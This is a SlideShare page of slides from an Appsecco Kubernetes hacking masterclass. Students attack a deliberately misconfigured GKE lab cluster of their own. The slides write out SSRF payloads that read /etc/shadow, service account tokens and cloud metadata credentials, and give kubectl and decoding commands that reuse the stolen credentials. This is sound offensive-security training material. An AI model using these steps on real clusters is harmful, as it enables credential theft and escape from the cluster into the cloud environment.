SlideShare a Scribd company logo

Appsecco Kubernetes Hacking Masterclass Presentation Slides

Appsecco
Appsecco

Appsecco Kubernetes Hacking Masterclass. The slides used during the class with links to the commands, scripts and setup information. These slides are to be used with the masterclass video recording on YouTube - Hands on exercises are highly recommended to get the most out of this class!

1 of 29
Download to read offline
Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
Let's deploy our cluster! (Lab setup)
Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
Kubernetes Security Controls (Hands-On)
Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
Role ClusterRole ClusterRoleBinding RoleBinding
Abusing RBAC privileges from within pods (Hands-On)
• All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
• Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
• The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
• Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
Appsecco Kubernetes Hacking Masterclass Presentation Slides
Post Exploitation in GKE (Hands-On / Homework)
We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
Env vars inside pod
kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
Google Cloud Compute SA Token Stealing
Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
Q&A
• Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers

More Related Content

What's hot

Cybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.comCybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.com
Aravind R
 
SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?
SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?
SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?
Ertugrul Akbas
 
HTTP/2の現状とこれから
HTTP/2の現状とこれからHTTP/2の現状とこれから
HTTP/2の現状とこれから
shigeki_ohtsu
 
集約署名
集約署名集約署名
集約署名
MITSUNARI Shigeo
 
Machine Learning in Cybersecurity.pdf
Machine Learning in Cybersecurity.pdfMachine Learning in Cybersecurity.pdf
Machine Learning in Cybersecurity.pdf
WaiYipLiew
 
Security vulnerability
Security vulnerabilitySecurity vulnerability
Security vulnerability
A. Shamel
 
Computer Security
Computer SecurityComputer Security
Computer Security
Frederik Questier
 
知らなかった! Bitcoinとethereumの違い
知らなかった! Bitcoinとethereumの違い知らなかった! Bitcoinとethereumの違い
知らなかった! Bitcoinとethereumの違い
Shinji Ayanami
 
Introduction Network security
Introduction Network securityIntroduction Network security
Introduction Network security
IGZ Software house
 
Types of attacks and threads
Types of attacks and threadsTypes of attacks and threads
Types of attacks and threads
srivijaymanickam
 
Kesif ve Zafiyet Tarama
Kesif ve Zafiyet TaramaKesif ve Zafiyet Tarama
Kesif ve Zafiyet Tarama
Ferhat Ozgur Catak
 
HTTP/2, QUIC入門
HTTP/2, QUIC入門HTTP/2, QUIC入門
HTTP/2, QUIC入門
shigeki_ohtsu
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
BGA Cyber Security
 
La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023
La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023
La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023
Lisa Lombardi
 
Become A Security Master
Become A Security MasterBecome A Security Master
Become A Security Master
Chong-Kuan Chen
 
Detecting and Blocking Suspicious Internal Network Traffic
Detecting and Blocking Suspicious Internal Network Traffic Detecting and Blocking Suspicious Internal Network Traffic
Detecting and Blocking Suspicious Internal Network Traffic
LogRhythm
 
Introduction to foot printing
Introduction to foot printingIntroduction to foot printing
Introduction to foot printing
CHETAN THAKRE
 
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans Verileri
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans VerileriLog Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans Verileri
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans Verileri
Ertugrul Akbas
 
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif KullanımıKurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
BGA Cyber Security
 

What's hot (20)

Cybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.comCybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.com
 
SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?
SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?
SIEM ÇÖZÜMLERİNDE TAXONOMY NE İŞE YARAR?
 
HTTP/2の現状とこれから
HTTP/2の現状とこれからHTTP/2の現状とこれから
HTTP/2の現状とこれから
 
集約署名
集約署名集約署名
集約署名
 
Machine Learning in Cybersecurity.pdf
Machine Learning in Cybersecurity.pdfMachine Learning in Cybersecurity.pdf
Machine Learning in Cybersecurity.pdf
 
Security vulnerability
Security vulnerabilitySecurity vulnerability
Security vulnerability
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
知らなかった! Bitcoinとethereumの違い
知らなかった! Bitcoinとethereumの違い知らなかった! Bitcoinとethereumの違い
知らなかった! Bitcoinとethereumの違い
 
Introduction Network security
Introduction Network securityIntroduction Network security
Introduction Network security
 
Types of attacks and threads
Types of attacks and threadsTypes of attacks and threads
Types of attacks and threads
 
Kesif ve Zafiyet Tarama
Kesif ve Zafiyet TaramaKesif ve Zafiyet Tarama
Kesif ve Zafiyet Tarama
 
HTTP/2, QUIC入門
HTTP/2, QUIC入門HTTP/2, QUIC入門
HTTP/2, QUIC入門
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
 
La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023
La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023
La cybersécurité, c'est quoi? Forum Attractivité 25/05/2023
 
Become A Security Master
Become A Security MasterBecome A Security Master
Become A Security Master
 
Keylogger
KeyloggerKeylogger
Keylogger
 
Detecting and Blocking Suspicious Internal Network Traffic
Detecting and Blocking Suspicious Internal Network Traffic Detecting and Blocking Suspicious Internal Network Traffic
Detecting and Blocking Suspicious Internal Network Traffic
 
Introduction to foot printing
Introduction to foot printingIntroduction to foot printing
Introduction to foot printing
 
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans Verileri
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans VerileriLog Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans Verileri
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans Verileri
 
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif KullanımıKurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
Kurumsal Ağlarda Saldırı Tespiti Amaçlı Honeypot Sistemlerin Efektif Kullanımı
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides

Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024
Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024
Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024
Riyaz Walikar
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
Suman Chakraborty
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
Kumton Suttiraksiri
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
Jerry Jalava
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
Alfonso Martino
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKE
Sreenivas Makam
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)
William Yeh
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
n|u - The Open Security Community
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDays Riga
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
Amazon Web Services
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
Velocidex Enterprises
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Qbox
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
Jitendra Bafna
 
Kubernetes Architecture with Components
Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with Components
Ajeet Singh
 
Intro to kubernetes
Intro to kubernetesIntro to kubernetes
Intro to kubernetes
Faculty of Technical Sciences, University of Novi Sad
 
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloud
Ajeet Singh
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operators
peychevi
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Davide Benvegnù
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Michael Man
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Malcolm Duncanson, CISSP
 

Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides (20)

Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024
Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024
Kubernetes Hacking for Fun & Profit - BSides Bangalore - 28th June 2024
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster
 
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB201904_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
04_Azure Kubernetes Service: Basic Practices for Developers_GAB2019
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
 
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2
 
Top 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKETop 3 reasons why you should run your Enterprise workloads on GKE
Top 3 reasons why you should run your Enterprise workloads on GKE
 
給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)給 RD 的 Kubernetes 初體驗 (EKS version)
給 RD 的 Kubernetes 初體驗 (EKS version)
 
Kubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbaiKubernetes 101 for_penetration_testers_-_null_mumbai
Kubernetes 101 for_penetration_testers_-_null_mumbai
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
 
Advanced Container Security
Advanced Container Security Advanced Container Security
Advanced Container Security
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and KibanaMonitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
Monitoring Docker Containers with Metricbeat, Elasticsearch, and Kibana
 
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...
 
Kubernetes Architecture with Components
Kubernetes Architecture with Components Kubernetes Architecture with Components
Kubernetes Architecture with Components
 
Intro to kubernetes
Intro to kubernetesIntro to kubernetes
Intro to kubernetes
 
Deploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloudDeploy the blockchain network using kubernetes ap is on google cloud
Deploy the blockchain network using kubernetes ap is on google cloud
 
Extending Kubernetes with Operators
Extending Kubernetes with OperatorsExtending Kubernetes with Operators
Extending Kubernetes with Operators
 
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...
 
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
Control Plane: Continuous Kubernetes Security (DevSecOps - London Gathering, ...
 
Masterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM RolesMasterless Puppet Using AWS S3 Buckets and IAM Roles
Masterless Puppet Using AWS S3 Buckets and IAM Roles
 

More from Appsecco

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
Appsecco
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
Appsecco
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019
Appsecco
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
Appsecco
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
Appsecco
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
Appsecco
 

More from Appsecco (7)

Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your App
 
Appsecco case studies 2020
Appsecco case studies 2020Appsecco case studies 2020
Appsecco case studies 2020
 
Appsecco case studies 2019
Appsecco case studies 2019Appsecco case studies 2019
Appsecco case studies 2019
 
Appsecco Case Studies 2018
Appsecco Case Studies 2018Appsecco Case Studies 2018
Appsecco Case Studies 2018
 
Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018Appsecco Sanity Check Baseline Cyber Audit 2018
Appsecco Sanity Check Baseline Cyber Audit 2018
 
Appsecco Procurement Support 2018
Appsecco Procurement Support 2018Appsecco Procurement Support 2018
Appsecco Procurement Support 2018
 
Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018Appsecco Private Equity Support 2018
Appsecco Private Equity Support 2018
 

Recently uploaded

COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...
COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...
COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...
Hironori Washizaki
 
Wired_2.0_Create_AmsterdamJUG_09072024.pptx
Wired_2.0_Create_AmsterdamJUG_09072024.pptxWired_2.0_Create_AmsterdamJUG_09072024.pptx
Wired_2.0_Create_AmsterdamJUG_09072024.pptx
SimonedeGijt
 
What is OCR Technology and How to Extract Text from Any Image for Free
What is OCR Technology and How to Extract Text from Any Image for FreeWhat is OCR Technology and How to Extract Text from Any Image for Free
What is OCR Technology and How to Extract Text from Any Image for Free
TwisterTools
 
AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...
AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...
AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...
karim wahed
 
React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...
React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...
React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...
Semiosis Software Private Limited
 
React Native vs Flutter - SSTech System
React Native vs Flutter - SSTech SystemReact Native vs Flutter - SSTech System
React Native vs Flutter - SSTech System
SSTech System
 
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdf
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdfWhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdf
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdf
onemonitarsoftware
 
dachnug51 - HCL Sametime 12 as a Software Appliance.pdf
dachnug51 - HCL Sametime 12 as a Software Appliance.pdfdachnug51 - HCL Sametime 12 as a Software Appliance.pdf
dachnug51 - HCL Sametime 12 as a Software Appliance.pdf
DNUG e.V.
 
ENISA Threat Landscape 2023 documentation
ENISA Threat Landscape 2023 documentationENISA Threat Landscape 2023 documentation
ENISA Threat Landscape 2023 documentation
sofiafernandezon
 
Folding Cheat Sheet #7 - seventh in a series
Folding Cheat Sheet #7 - seventh in a seriesFolding Cheat Sheet #7 - seventh in a series
Folding Cheat Sheet #7 - seventh in a series
Philip Schwarz
 
Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...
Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...
Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
Overview of ERP - Mechlin Technologies.pptx
Overview of ERP - Mechlin Technologies.pptxOverview of ERP - Mechlin Technologies.pptx
Overview of ERP - Mechlin Technologies.pptx
Mitchell Marsh
 
Leading Project Management Tool Taskruop.pptx
Leading Project Management Tool Taskruop.pptxLeading Project Management Tool Taskruop.pptx
Leading Project Management Tool Taskruop.pptx
taskroupseo
 
WEBINAR SLIDES: CCX for Cloud Service Providers
WEBINAR SLIDES: CCX for Cloud Service ProvidersWEBINAR SLIDES: CCX for Cloud Service Providers
WEBINAR SLIDES: CCX for Cloud Service Providers
Severalnines
 
Cultural Shifts: Embracing DevOps for Organizational Transformation
Cultural Shifts: Embracing DevOps for Organizational TransformationCultural Shifts: Embracing DevOps for Organizational Transformation
Cultural Shifts: Embracing DevOps for Organizational Transformation
Mindfire Solution
 
Shivam Pandit working on Php Web Developer.
Shivam Pandit working on Php Web Developer.Shivam Pandit working on Php Web Developer.
Shivam Pandit working on Php Web Developer.
shivamt017
 
MVP Mobile Application - Codearrest.pptx
MVP Mobile Application - Codearrest.pptxMVP Mobile Application - Codearrest.pptx
MVP Mobile Application - Codearrest.pptx
Mitchell Marsh
 
Migrate your Infrastructure to the AWS Cloud
Migrate your Infrastructure to the AWS CloudMigrate your Infrastructure to the AWS Cloud
Migrate your Infrastructure to the AWS Cloud
Ortus Solutions, Corp
 
active-directory-auditing-solution (2).pptx
active-directory-auditing-solution (2).pptxactive-directory-auditing-solution (2).pptx
active-directory-auditing-solution (2).pptx
sudsdeep
 
